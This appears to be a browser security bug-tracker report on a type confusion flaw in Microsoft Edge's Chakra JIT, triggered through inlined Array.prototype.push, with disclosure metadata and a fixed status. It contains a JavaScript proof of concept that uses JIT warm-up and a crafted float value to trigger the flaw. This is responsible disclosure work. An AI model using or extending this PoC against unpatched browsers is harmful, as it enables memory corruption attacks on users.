Issue 1578

Issue metadata
Status: Fixed
Closed: Aug 16

Microsoft Edge: Chakra: JIT: Type confusion with InlineArrayPush

Project Member Reported by lokihardt@google.com, May 17

Issue description

This is similar to issue 1531. The patch seems to prevent type confusion triggered from StElemI_A instructions. But the SetItem method can also be invoked through the Array.prototype.push method, which can be inlined. We can achieve type confusion with the push method in the same way used for issue 1531.

PoC:
function opt(arr, value) {
    arr.push(value);  // <-------- inlined Array.prototype.push still reaches SetItem
    arr[0] = 2.3023e-320;
}

function main() {
    // Warm-up loop: get opt() JIT-compiled with push inlined, always
    // seeing a float array that has a hole (created by the delete).
    for (let i = 0; i < 0x10000; i++) {
        let tmp = [1.1, 2.2, 3.3];
        delete tmp[1];

        opt(tmp, 2.2);
    }

    // Now run the optimized code on an array without a hole.
    let arr = [1.1];
    opt(arr, -5.3049894784e-314);  // MAGIC VALUE!

    alert(arr);
}

main();

This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public.

Project Member

Comment 1 by lokihardt@google.com, Aug 16

Status: Fixed (was: New)
Project Member

Comment 2 by lokihardt@google.com, Aug 17

Labels: -Restrict-View-Commit
Project Member

Comment 3 by lokihardt@google.com, Aug 27

Cc: lokihardt@google.com
Issue 1581 has been merged into this issue.
